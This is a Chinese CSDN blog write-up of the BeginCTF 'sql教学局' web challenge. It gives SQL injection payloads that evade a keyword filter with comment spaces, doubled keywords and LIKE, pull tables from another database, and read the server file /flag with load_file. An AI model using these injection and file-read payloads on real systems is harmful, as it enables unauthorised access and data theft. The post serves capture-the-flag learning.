BeginCTF web (sql教学局)

最新推荐文章于 2024-02-13 20:48:22 发布
最新推荐文章于 2024-02-13 20:48:22 发布
阅读量357 收藏 9
点赞数 10
文章标签: web安全 mysql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75155186/article/details/136049825
版权

通过/**/来绕过了空格

通过双写绕过了select,or等等

通过like来绕过=

load_file来读取文件

获取第一段flag

  • 首先经过判断waf过滤了空格,or

使用order by 来判断字段

?user=1%27oorrder/**/by/**/1%23

发现回显是1

通过下面的提示发现第一段flag在secret数据库password表里面

首先要进行判断字段

    • 进行构造,发现=被过滤,那就使用like来绕过

    • 如何在构造的时候发现好多过滤,都使用了双写来绕过
    • group_concat的用法是将多个数据一起输出,就剩了用limit一个个看
?user=1%27union/**/selselectect/**/group_concat(column_name)/**/frfromom/**/infoorrmation_schema.columns/**/where/**/table_name/**/like/**/'passwoorrd'%23

知道了要获取的数据的列名是flag,表名是password

获取flag数据

正常构造的话发现会报错,我也研究了很久,最后是教练提醒才知道

password表并不在ctf这个数据库中,所以我们要在password前面加上数据库secret

最后的构造

?user=1%27union/**/selselectect/**/flag/**/frfromom/**/secret.passwoorrd%23

成功获取第一段flag

获取第二段flag

通过提示我们知道第二段flag在当前数据库的score表的学生begin的成绩(grader)里面

我们首先要知道表的列名

?user=1%27union/**/selselectect/**/group_concat(column_name)/**/frfromom/**/infoorrmation_schema.columns/**/where/**/table_name/**/like/**/'scoorre'%23、
//记得这里的score表中也有or记得双写绕过

接下来查询第二段flag

user=1%27union/**/selselectect/**/grade/**/frfromom/**/scoorre/**/where/**/student/**/like/**/'begin'%23

获取第三段flag

通过提示知道flag在/flag下,这当时也困扰了许久,一开始去尝试用shell写入,发现<>被过滤,听了一个学长给的建议是有目录先尝试读取,没办法了在去尝试shell,使用函数load_file

我们这里可以用union select,还有其他的子句可以用,可以自己去看看,开始构造

发现load也被过滤,老办法双写绕过

?user=1%27union/**/selselectect/**/loloadad_file('/flag')%23

最后成功拿到flag,不得不感叹,自己还是太菜了,还有就是,学习的路上不知你一个人,加油吧,少年!!!!!

python是什么
关注
  • 10
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
CTF-CRYPTO-RSA-partial
zippo1234的博客
11-21 765
CTF-CRYPTO-RSA-partialRSA-partial题目分析开始1.题目2.分析(1)已给出部分解密(2)rsa私钥格式解析(3)理论4.常规套路5.get flag结语 每天一题,只能多不能少 RSA-partial 题目分析 私钥格式 私钥恢复 开始 1.题目 题目介绍 这里有一张RSA私钥上半部分被挡住的截图,你能恢复私钥并解密出flag的内容吗?flag格式为0ctf{字符串}。 -----BEGIN RSA PRIVATE KEY----- ****隐藏的部分**** Os9mh
vue+element-ui+websql
04-19
在“vue+element-ui+websql”这个项目中,开发者选择使用 Vue.js 作为基础框架来构建应用的逻辑和视图层。Vue.js 提供了双向数据绑定、虚拟DOM、指令系统等特性,使得开发者可以轻松地管理应用程序的状态和视图更新...
【Java】小白友好的Servlet基础学习笔记
uuzeray的博客
01-24 1347
后面比赛挺多,RW体验赛,西湖论剑,beginCTF,N1CTF,hgame,NSS新春赛,NSS Round17,SICTF,有观赏性大于操作性的,有萌新可以真正去打的。经过慎重考虑,决定java先暂放几天,再回过头去练练老题,也是换换脑子。
BeginCTF 2024 Reverse WP
qq_36612618的博客
02-06 1626
BeginCTF 2024 Reverse WP
2024BeginCTF(自由赛道)writeup
qq_74349936的博客
02-06 1639
参加了beginCTF的比赛,在此记录一下我自己做题的思路。(本人太菜没写出几道题)有什么写的不对的地方,欢迎指正。
Web】小白也能看懂的BeginCTF个人wp(全)
uuzeray的博客
02-06 2577
纯萌新,贴出自己的wp,一起交流学习QWQ。
jquery+easyui+websql.rar
04-19
在本项目中,"jquery+easyui+websql.rar"是一个包含了使用jQuery、EasyUI框架以及WebSQL(或LocalStorage)技术来实现前端数据管理的压缩包。以下将详细阐述这些技术及其相互配合的方式。 首先,jQuery是一个广泛...
Web SQL数据库概述.pptx
10-27
Web SQL数据库概述 Web SQL数据库是HTML5中的一种客户端数据库解决方案,使用SQL语言来操作客户端数据库的API。它的出现是为了解决HTML5本地存储的限性,例如localStorage和sessionStorage只能存储少量数据结构,...
sql.zip_web sql_web登录
09-21
在本项目中,"sql.zip_web sql_web登录" 提供了一个关于Web登录程序与数据库连接的实践案例。这个压缩包可能包含实现一个简单的Web应用程序所需的文件,尤其是与SQL交互的部分。下面将详细讨论相关的知识点: 1. **...
WebSql 学习实例
11-03
WebSQLWeb应用程序本地存储数据的一种机制,尤其适用于离线应用。它是一个内置于浏览器中的SQLite数据库,允许JavaScript在客户端进行复杂的数据操作,无需服务器的交互。本学习实例将深入探讨WebSQL的基本概念、...
BeginCTF 2024(新生赛道)WP-P1sc3s007
Pisces50002的博客
02-06 1302
卡版本很恶心,必须下载python3.8再使用pyinstxtractor.py才能提取出作者自定义的一些文件。中间涉及到rc4,但是最后用于比对的key2和str1经过同一个S盒的RC4加密,等于没加密。几个长得像key的几个字符串是有用的,排除干扰之后逻辑非常简单。原本在手搓,但实际上只要找一个编译器跑一遍就可以。几个问答全都没用,看中间关键的几个加密函数。算法不复杂,就是大量的异或,慢慢还原就好。解密的时候记得异或一下key就可以了。还是解不出来,看一下引用的sm4(
BeginCTF2024-WP——MISC部分
ASD830的博客
02-06 1182
通过观察36个图案,我们发现每个图案都是两个图形组成,这里猜测摩斯密码为:一个交点为“.”,两个交点为“-”,没有交点为“空格”;(得到的flag需要小写:begin{小写})--. --- ..--.- .- ... .... --- .-. . 摩斯密码解密后得到“GO_ASHORE” ,即flag为。可接受的格式有两种begin{{三位简体中文}}或者begin{{9位英文字母第一个需要大写}}可接受的格式有begin{{14位英文字母中间需要空格然后两个词首字母需要大写}}你能找到空白在哪里吗?
BeginCTF2024 wp web&&misc
永不落的梦想
02-06 1150
php反序列化,源码如下;B::__destruct()作为开头,调用A不存在的变量,触发A::__get(),调用Fun不存在的方法,触发__call的回调函数执行phpinfo,flag在phpinfo中;
BeginCTF部分wp
weixin_45208145的博客
02-06 1763
这次beginctf新生赛一边问gpt一边做,最后勉强捡了个第八名以下是部分题解。
beginCTF 2024 Web方向题解WP 全
Jay17的博客
02-06 1872
beginCTF 2024 Web方向题解WP 全
BeginCTF2024 RE WP 部分复现
Pisces50002的博客
02-07 1379
start函数往下翻,有一坨赋值,把数据按C键转成代码,去掉花(可能是花搞不清楚)——也并不能还原伪代码,不过可以大致看看。一个个看,点进第三个可以看到两个疑似密文的地址,点进第四个则是触发Handler的部分。主函数看起来是个tea,但是题目都告诉我们not main,说明这个不对。进去,rdx,rcx寄存器里好像有字符串,但是没到cmp,往下走几步。接下来要解密,原代码非常混乱,我们先整理一下,简单去混淆。可能主函数TEA不是假的,又进行了TEA加密。a应该是行数索引,b是输入的字符,经过。
2024BeginCTF Crypto
weixin_73698762的博客
02-06 2080
整理一下式子n2=(xt+y)*(yt+x)=xyt^2+(x^2+y^2)t+xy,由于x,y都是61位的数字,所以xyt^2约为244位,(x^2+y^2)t约为183,xy约为122位的,对于四组61位中,第一组61位只有xy的前61位,而第二组有xy的后61位+x^2+y^2的前61位,第三组为x^2+y^2的后61位与xy的前61位,最后一组为xy的后61位,因此可以计算出xy,解出xy后就可以计算出x^2+y^2,然后解个方程就可以把x,y解出来了。数据丢失了重新跑的,然后后面的就很简单了。
2024beginCTF-Crypto 复现
最新发布
qq_41889600的博客
02-13 606
2024beginCTF Crypto 复现
BeginCTF-xor(z3)
weixin_52230368的博客
02-06 538
注意下面基础的下标,与伪代码要稍加改动。这地方卡了好久(菜鸡崩溃)。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值